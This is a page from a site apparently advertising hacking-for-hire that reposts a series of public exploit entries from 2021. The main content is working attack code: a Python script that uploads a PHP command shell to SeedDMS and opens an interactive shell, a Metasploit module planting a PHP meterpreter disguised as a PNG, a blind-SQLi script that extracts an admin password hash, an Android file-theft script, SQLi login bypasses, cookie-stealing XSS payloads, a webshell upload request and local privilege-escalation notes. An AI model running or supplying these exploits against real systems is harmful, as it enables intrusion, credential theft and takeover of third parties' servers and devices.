Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863147330

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated) 
# Date: 25/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: https://www.seeddms.org/index.php?id=2
# Software Link: https://sourceforge.net/projects/seeddms/files/seeddms-5.0.11/
# Version: Seeddms 5.1.10
# Tested on: Windows 7 x64
# CVE: CVE-2019-12744

import requests
import argparse
import sys
import random
import string
from bs4 import BeautifulSoup
from requests_toolbelt import MultipartEncoder

def sysArgument():
    ap = argparse.ArgumentParser()

    ap.add_argument("-u", "--username", required=True, help="login username")
    ap.add_argument("-p", "--password", required=True, help="login password")
    ap.add_argument("--url", required=True, help="target URL Path")

    args = vars(ap.parse_args())

    return args['username'], args['password'], args['url'] 

def login(sessionObj, username, password, url):
    loginPath = "/op/op.Login.php"    
    url += loginPath

    postData = {
        'login': username,
        'pwd': password,
        'lang' : 'en_GB'
    }
    try:
        rsl = sessionObj.post(url, data=postData)

        if(rsl.status_code == 200):
            if "Error signing in. User ID or password incorrect." in rsl.text:
                print("[!] Incorrect Credential.")
            else:
                print("[*] Login Successful.") 
                print("[*] Session Token: " + sessionObj.cookies.get_dict()['mydms_session'])
                return sessionObj                
                
        else:
            print("[!] Something went wrong.")    
            print("Status Code: %d" % (rsl.status_code))
            sys.exit(0)
    except Exception as e:
        print("[!] Something Went Wrong!")
        print(e)
        sys.exit(0)

    return sessionObj

def formTokenCapturing(sessionObj, url):
    path = "/out/out.AddDocument.php?folderid=1&showtree=1"
    url += path
    formToken = ""

    try:        
        rsl = sessionObj.get(url)

        if(rsl.status_code == 200):
            print("[*] Captured Form Token.")

            #extracting form token
            soup = BeautifulSoup(rsl.text,'html.parser')
            form1 = soup.findAll("form", {"id": "form1"})
            
            soup = BeautifulSoup(str(form1[0]),'html.parser')
            formToken = soup.find("input", {"name": "formtoken"})            
            print("[*] Form Token: " + formToken.attrs['value'])
            
            return sessionObj, formToken.attrs['value']
        else:
            print("[!] Something went wrong.")    
            print("Status Code: %d" % (rsl.status_code))
            sys.exit(0)

    except Exception as e:
        print("[!] Something Went Wrong!")
        print(e)
        sys.exit(0)

    return sessionObj, formToken

def uploadingPHP(sessionObj, url, formToken):
    path = "/op/op.AddDocument.php"
    url += path

    #generating random name
    letters = string.ascii_lowercase
    rand_name = ''.join(random.choice(letters) for i in range(20))

    #POST Data
    payload = {
        'formtoken' : formToken,
        'folderid' : '1',
        'showtree' : '1',
        'name' : rand_name,
        'comment' : '',
        'keywords' : '',
        'sequence' : '2',
        'presetexpdate' : 'never',
        'expdate' : '',
        'ownerid' : '1',
        'reqversion' : '1',
        'userfile[]' : (
            '%s.php' % (rand_name),           
            open('phpCmdInjection.php', 'rb'), 
            'application/x-httpd-php'
            ),
        'version_comment' : ''
    }
    
    multiPartEncodedData = MultipartEncoder(payload)

    try:                
        rsl = sessionObj.post(url, data=multiPartEncodedData, headers={'Content-Type' : multiPartEncodedData.content_type})

        if(rsl.status_code == 200):
            print("[*] Command Injection PHP Code Uploaded.")
            print("[*] Name in Document Content Shows: " + rand_name)

            return sessionObj, rand_name
        else:
            print("[!] Something went wrong.")    
            print("Status Code: %d" % (rsl.status_code))
            sys.exit(0)


    except Exception as e:
        print("[!] Something Went Wrong!")
        print(e)
        sys.exit(0)

    return sessionObj, rand_name

def getDocID(sessionObj, url, docName):
    path = "/out/out.ViewFolder.php?folderid=1"
    url += path
    
    try:        
        rsl = sessionObj.get(url)

        if(rsl.status_code == 200):
            #searching & extracting document id storing payload
            soup = BeautifulSoup(rsl.text,'html.parser')
            viewFolderTables = soup.findAll("table", {"id": "viewfolder-table"})
            
            soup = BeautifulSoup(str(viewFolderTables[0]),'html.parser')
            rowsDoc = soup.findAll("tr", {"class": "table-row-document"})            

            for i in range(len(rowsDoc)):
                soup = BeautifulSoup(str(rowsDoc[i]),'html.parser')
                tdExtracted = soup.findAll("td") 
                
                foundDocName = tdExtracted[1].contents[0].contents[0]

                #when document name matched uploaded document name
                if(foundDocName == docName):
                    print("[*] Found Payload Document Name. Extracting Document ID...")
                    tmp = tdExtracted[1].contents[0].attrs['href'].split('?')
                    docID = tmp[1].replace("&showtree=1", "").replace('documentid=', '')

                    print("[*] Document ID: " + docID)

                    return sessionObj, docID

            #after loops & still unable to find matched uploaded Document Name
            print("[!] Unable to find document ID.")
            sys.exit(0)
            
        else:
            print("[!] Something went wrong.")    
            print("Status Code: %d" % (rsl.status_code))
            sys.exit(0)

    except Exception as e:
        print("[!] Something Went Wrong!")
        print(e)
        sys.exit(0)

    return sessionObj

def shell(sessionObj, url, docID):
    #remove the directory /seeddms-5.1.x
    splitUrl = url.split('/')
    remLastDir = splitUrl[:-1]

    url = ""
    #recontruct url
    for text in remLastDir:
        url += text + "/"

    #path storing uploaded php code
    path = "/data/1048576/%s/1.php" % docID
    url += path

    #checking does the uploaded php exists?
    rsl = sessionObj.get(url)

    if(rsl.status_code == 200):
        print("[*] PHP Script Exist!")
        print("[*] Injecting some shell command.")

        #1st test injecting whoami command
        data = {
            'cmd' : 'whoami'
        }

        rsl = sessionObj.post(url, data=data)

        if(rsl.text != ""):
            print("[*] There's response from the PHP script!")
            print('[*] System Current User: ' + rsl.text.replace("<pre>", "").replace("</pre>", ""))
            
            print("[*] Spawning Shell. type .exit to exit the shell", end="\n\n")
            #start shell iteration
            while(True):
                cmd = input("[Seeddms Shell]$ ")

                if(cmd == ".exit"):
                    print("[*] Exiting shell.")
                    sys.exit(0)

                data = {
                    'cmd' : cmd
                }

                rsl = sessionObj.post(url, data=data)
                print(rsl.text.replace("<pre>", "").replace("</pre>", ""))

        else:
            print("[!] No response from PHP script. Something went wrong.")
            sys.exit(0)

    else:
        print("[!] PHP Script Not Found!!")
        print(rsl.status_code)
        sys.exit(0)




def main():    
    username, password, url = sysArgument()

    sessionObj = requests.Session()    

    #getting session token from logging in    
    sessionObj = login(sessionObj, username, password, url)

    #capturing form token for adding document
    sessionObj, formToken = formTokenCapturing(sessionObj, url)

    #uploading php code for system command injection
    sessionObj, docName = uploadingPHP(sessionObj, url, formToken)

    #getting document id
    sessionObj, docID = getDocID(sessionObj, url, docName)
    
    #spawning shell to exec system Command
    shell(sessionObj, url, docID)

if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title: SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 21-06-2021
# Vendor Homepage:  https://brother.com/
# Tested Version: 7.60
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

SAPSprint    SAPSprint   C:\Program Files\SAP\SAPSprint\sapsprint.exe   Auto

C:\>sc qc SAPSprint
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SAPSprint
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE        : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME:  C:\Program Files\SAP\SAPSprint\sapsprint.exe
        LOAD_ORDER_GROUP  :
        TAG           : 0
        DISPLAY_NAME     : SAPSprint
        DEPENDENCIES       : Spooler
        SERVICE_START_NAME: LocalSystem
HireHackking 
# Exploit Title: WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)
# Date: 09/06/2021
# Exploit Author: inspired - Toby Jackson
# Vendor Homepage: https://yop-poll.com/
# Blog Post: https://www.in-spired.xyz/discovering-wordpress-plugin-yop-polls-v6-2-7-stored-xss/
# Software Link: https://en-gb.wordpress.org/plugins/yop-poll/
# Version: Tested on version 6.2.7 (Older versions may be affected)
# Tested on: WordPress
# Category : Webapps

## I. Vulnerability

Stored Cross Site Scripting (XSS)

## II. Product Overview

The software allows users to quickly generate polls and voting systems for their blog posts without any need for programming knowledge. 

## III. Exploit 

When a poll is created that allows other answers and then the setting is enabled for displaying the other responses after submission, the other answer is not sanitized when displayed back to the user, showing an XSS vulnerability. It is, however, correctly sanitized when displaying the other choices on the initial vote page.

## IV. Vulnerable Code

The vulnerable code resides in the fact the results are echoed back to the user without any sanitization performed on the output. It also gets stored in the database as it's inserts.

## IV. Proof of Concept

- Create a new poll that allows other answers, with the results of the other answers being displayed after voting.
- Set the permissions to whoever you'd like to be able to vote.
- Place it on a blog post.
- Insert '<script>alert('xss')</script>' into the other box.
- Submit vote. The payload gets triggered when reflected back to users.
- Whenever a new user votes, they will also be affected by the payload.

## VI. Impact

An attacker can leave stored javascript payloads to be executed whenever a user votes and views the results screen. This could lead to them stealing cookies, logging keystrokes and even stealing passwords from autocomplete forms.

## VII. SYSTEMS AFFECTED

WordPress websites running "YOP Polls" plugin version 6.2.7 (older versions may also be affected).

## VIII. REMEDIATION

Update the plugin to v6.2.8.

## VIIII. DISCLOSURE TIMELINE
-------------------------
June 9, 2021 1: Vulnerability identified.
June 9, 2021 2: Informed developer of the vulnerability.
June 10, 2021 1: Vendor requested proof of concept.
June 10, 2021 2: Sent proof of concept and accompanying details.
June 14, 2021 1: Vendor emails to state the vulnerability has been fixed.
June 16, 2021 1: Confirmed fix, vendor happy to disclose the vulnerability.
June 17, 2021 1: Requested CVE Number.
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Lightweight facebook-styled blog authenticated remote code execution",
      'Description'    => %q{
        This module exploits the file upload vulnerability of Lightweight self-hosted facebook-styled PHP blog and allows remote code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Maide Ilkay Aydogdu <ilkay@prodaft.com>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://prodaft.com']
        ],
      'DefaultOptions'  =>
        {
          'SSL' => false,
          'WfsDelay' => 5,
        },
      'Platform'       => ['php'],
      'Arch'           => [ ARCH_PHP],
      'Targets'        =>
        [
          ['PHP payload',
            {
              'Platform' => 'PHP',
              'Arch' => ARCH_PHP,
              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 19 2018",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('USERNAME', [true, 'Blog username', 'demo']),
        OptString.new('PASSWORD', [true, 'Blog password', 'demo']),
        OptString.new('TARGETURI', [true, 'The URI of the arkei gate', '/'])
      ]
    )
  end



  def login

    res = send_request_cgi(
      'method'    => 'GET',
      'uri'       => normalize_uri(target_uri.path),
    )


    cookie = res.get_cookies
    token = res.body.split('":"')[1].split('"')[0]
    # token = res.to_s.scan(/"[abcdef0-9]{10}"}/)[0].to_s.tr('"}', '')
    print_status("Got CSRF token: #{token}")
    print_status('Logging into the blog...')
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'ajax.php'),
      'headers' => {
        'Csrf-Token' => token,
      },
      'cookie' => cookie,
      'data'      => "action=login&nick=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}",
    )

    if res && res.code == 200
      print_good("Successfully logged in with #{datastore['USERNAME']}")
      json = res.get_json_document
      if json.empty? && json['error']
        print_error('Login failed!')
        return nil, nil
      end
    else
      print_error("Login failed! Status code #{res.code}")
      return nil, nil
    end

    return cookie, token
  end


  def exploit
    cookie, token = login
    unless cookie || token
      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed")
    end

    data = Rex::MIME::Message.new # jWPU1tZmoAZgooopowaNGjRq0KhBowaNGjRqEHYAALgBALdg7lyPAAAAAElFTkSuQmCC
    png = Base64.decode64('iVBORw0KGgoAAAANSUhEUgAAABgAAAAbCAIAAADpgdgBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJElEQVQ4') # only the PNG header
    data.add_part(png+payload.encoded, 'image/png', 'binary', "form-data; name=\"file\"; filename=\"mia.php\"")
    print_status('Uploading shell...')
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path,'ajax.php'),
      'cookie' => cookie,
      'vars_get' => {
        'action' => 'upload_image'
      },
      'headers' => {
        'Csrf-Token' => token,
      },
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => data.to_s,
    )

    # print_status(res.to_s)
    if res && res.code == 200
      json = res.get_json_document
      if json.empty? || !json['path']
        fail_with(Failure::UnexpectedReply, 'Unexpected json response')
      end

      print_good("Shell uploaded as #{json['path']}")
    else
      print_error("Server responded with code #{res.code}")
      print_error("Failed to upload shell")
      return false
    end

    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, json['path'])}, 3
    )
    print_good("Payload successfully triggered !")
  end
end
HireHackking

ES File Explorer 4.1.9.7.4 - Arbitrary File Read

HACKER · %s · %s

# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read # Date: 29/06/2021 # Exploit Author: Nehal Zaman # Version: ES File Explorer v4.1.9.7.4 # Tested on: Android # CVE : CVE-2019-6447 import requests import json import ast import sys if len(sys.argv) < 3: print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]") sys.exit(1) url = 'http://' + sys.argv[2] + ':59777' cmd = sys.argv[1] cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo'] listCmds = cmds[:9] if cmd not in cmds: print("[-] WRONG COMMAND!") print("Available commands : ") print(" listFiles : List all Files.") print(" listPics : List all Pictures.") print(" listVideos : List all videos.") print(" listAudios : List all audios.") print(" listApps : List Applications installed.") print(" listAppsSystem : List System apps.") print(" listAppsPhone : List Communication related apps.") print(" listAppsSdcard : List apps on the SDCard.") print(" listAppsAll : List all Application.") print(" getFile : Download a file.") print(" getDeviceInfo : Get device info.") sys.exit(1) print("\n==================================================================") print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |") print("| Coded By : Nehal a.k.a PwnerSec |") print("==================================================================\n") header = {"Content-Type" : "application/json"} proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"} def httpPost(cmd): data = json.dumps({"command":cmd}) response = requests.post(url, headers=header, data=data) return ast.literal_eval(response.text) def parse(text, keys): for dic in text: for key in keys: print(f"{key} : {dic[key]}") print('') def do_listing(cmd): response = httpPost(cmd) if len(response) == 0: keys = [] else: keys = list(response[0].keys()) parse(response, keys) if cmd in listCmds: do_listing(cmd) elif cmd == cmds[9]: if len(sys.argv) != 4: print("[+] Include file name to download.") sys.exit(1) elif sys.argv[3][0] != '/': print("[-] You need to provide full path of the file.") sys.exit(1) else: path = sys.argv[3] print("[+] Downloading file...") response = requests.get(url + path) with open('out.dat','wb') as wf: wf.write(response.content) print("[+] Done. Saved as `out.dat`.") elif cmd == cmds[10]: response = httpPost(cmd) keys = list(response.keys()) for key in keys: print(f"{key} : {response[key]}")
HireHackking
# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) # Date: 06/05/2021 # Exploit Author: CAPTAIN_HOOK # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/jira/download/data-center # Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1 # Tested on: ANY # CVE : CVE-2021-26078 Description: The number range searcher component in Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before version 8.13.6, and from version 8.14.0 before version 8.16.1 allows remote attackers inject arbitrary HTML or JavaScript via across site scripting (XSS) vulnerability *Fixed versions:* - 8.5.14 - 8.13.6 - 8.16.1 - 8.17.0 POC: - *Story points* custom field that exists by default in all JIRA Server has 3 types of Search template ( None , number range searcher, number searcher) By default the value of Search template is number range searcher OR number searcher. if the value of Search template was set on number range searcher the JIRA server is vulnerable to XSS attack by lowest privilege . For Testing Check the Story points custom field and it's details ( for verifying that the Search template sets on number range searcher) with your ADMIN account ( just like the images) and in the other window Type this With your least privilege user : jql=issuetype%20%3D%20Epic%20AND%20%22Story%20Points%22%20%3C%3D%20%22%5C%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%22%20AND%20%22Story%20Points%22%20%3E%3D%20%221%22 Your XSS Will be triggered immediately. Reference: https://jira.atlassian.com/browse/JRASERVER-72392?error=login_required&error_description=Login+required&state=9b05ec1f-587c-4014-9053-b6fdbb1efa21
HireHackking

phpAbook 0.9i - SQL Injection

HACKER · %s · %s

# Exploit Title: phpAbook 0.9i - SQL Injection # Date: 2021-06-29 # Vendor Homepage: http://sourceforge.net/projects/phpabook/ # Exploit Author: Said Cortes, Alejandro Perez # Version: v0.9i # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. import requests import argparse import string import sys def exploit(session,host): print("Starting Exploit\nSearching Admin Hash...") passwordhash = '' for i in range(1,33): charset = string.digits + string.ascii_lowercase for letter in charset: burp0_url = f"{host}/index.php" burp0_data = {"auth_user": f"admin'-IF((SELECT MID(password,{i},1) from ab_auth_user where uid=1)='{letter}',SLEEP(3),0)#", "auth_passwd": "admin", "lang": "en", "submit": "Login"} try: session.post(burp0_url, data=burp0_data, timeout=1) except requests.Timeout: passwordhash += letter continue print("admin:"+passwordhash) if __name__ == "__main__" : session = requests.session() parser = argparse.ArgumentParser() parser.add_argument("-u","--url",help="host url \nex: http://127.0.0.1/phpabook",required=True) arg = parser.parse_args() exploit(session,arg.url)
HireHackking
# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass) # Date: 06/30/2021 # Exploit Author: Murat DEMIRCI (butterflyhunt3r) # Vendor Homepage: https://www.codester.com/ # Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system # Version: 1.0 # Tested on: Windows 10 # Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication. # Proof of Concept : http://test.com/PATH/signin # Username : anything # Password : ' or '1'='1
HireHackking

Vianeos OctoPUS 5 - 'login_user' SQLi

HACKER · %s · %s

# Exploit Title: Vianeos OctoPUS 5 - 'login_user' SQLi # Date: 01/07/2021 # Exploit Author: Audencia Business SCHOOL # Vendor Homepage: http://www.vianeos.com/en/home-vianeos/ # Software Link: http://www.vianeos.com/en/octopus/ # Version: > V5 # Tested on: Fedora / Apache2 / MariaDB Octopus V5 SQLi The "login_user =" parameter present in the POST authentication request is vulnerable to an Time Based SQLi as follow : ``` Parameter: login_user (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: signin_user=1&login_user=1' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))xENj) AND 'OoKG'='OoKG&password_user=1 ```
HireHackking

Online Voting System 1.0 - Remote Code Execution (Authenticated)

HACKER · %s · %s

# Exploit Title: Online Voting System 1.0 - Remote Code Execution (Authenticated) # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date 30.06.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 #################### # Proof of Concept # #################### POST /Online_voting_system/admin/save_candidate.php HTTP/1.1 Host: localhost Content-Length: 1253 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4G9QRpniTS7gPVqW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/Online_voting_system/admin/new_candidate.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a Connection: close ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="user_name" admin ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rfirstname" test ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rlastname" test ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rgender" Male ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="ryear" 1st year ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rmname" test ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="rposition" Governor ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="party" test ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="image"; filename="test.php" Content-Type: application/octet-stream <?php echo exec("whoami"); ?> ------WebKitFormBoundary4G9QRpniTS7gPVqW Content-Disposition: form-data; name="save" ------WebKitFormBoundary4G9QRpniTS7gPVqW-- ######## # Note # ######## Uploaded file will be available at http://localhost/Online_voting_system/admin/upload/
HireHackking

Scratch Desktop 3.17 - Remote Code Execution

HACKER · %s · %s

# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE) # Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning) # Date: 2021-06-18 # Exploit Author: Stig Magnus Baugstø # Vendor Homepage: https://scratch.mit.edu/ # Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe # Version: 3.10.2 # Tested on: Windows 10 x64, but should be platform independent. # CVE: CVE-2020-7750 Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008 CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/ You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example: <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" /> </svg> The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way. Example of regular cross-site scripting (XSS): <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image href="doesNotExist.png" onerror="alert('Pwned!')" /> </svg> The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE): <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" /> </svg> The example above launches cmd.exe (Command Prompt) on Windows. For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/ Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
HireHackking
# Exploit Title: WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control # Date: 2021-07-01 # Author: Andrea Intilangelo # Vendor Homepage: http://nica.it - http://winwastenet.com # Version: 1.0.6183.16475 # Tested on: Windows 10 Pro x64 - 20H2 and 21H1 # CVE: CVE-2021-34110 WinWaste.NET version 1.0.6183.16475 (from Nica s.r.l., a Zucchetti Group company) allows a local unprivileged user to replace the executable with a malicious file that will be executed with "LocalSystem" privileges. (1) Affected service's executable: "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe" (2) Attack Vectors: replacing the WinWasteService.exe and/or any tied .dll used by the software. (3) Details: C:\Users\user>sc qc winwasteservice [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: winwasteservice TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe" GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : WinwasteService DIPENDENZE : SERVICE_START_NAME : LocalSystem C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe" C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe Everyone:(I)(M) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX) Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe" C:\Program Files (x86)\WW.NET\WW.PROG\WINWASTESERVICE.EXE Everyone:(ID)C NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG" C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(I)(OI)(CI)(M) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE) Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\" C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(OI)(CI)(ID)C NT SERVICE\TrustedInstaller:(ID)F NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F NT AUTHORITY\SYSTEM:(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Administrators:(OI)(CI)(IO)(ID)F BUILTIN\Users:(ID)R BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:) GENERIC_READ GENERIC_EXECUTE CREATOR OWNER:(OI)(CI)(IO)(ID)F AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(OI)(CI)(IO)(ID)(accesso speciale:) GENERIC_READ GENERIC_EXECUTE AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(OI)(CI)(IO)(ID)(accesso speciale:) GENERIC_READ GENERIC_EXECUTE
HireHackking
# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF) # Exploit Author: Alperen Ergel (@alpernae) # Vendor Homepage: https://b2evolution.net/ # Software Link: https://b2evolution.net/downloads/7-2-2 # Version : 7.2.2 # Tested on: Kali Linux # Category: WebApp ######## Description ######## Allows to attacker change admin account details. ######## Proof of Concept ######## ===> REQUEST <==== POST /b2evolution/evoadm.php HTTP/1.1 Host: s2.demo.opensourcecms.com Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt; __cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK- zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA; _ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; 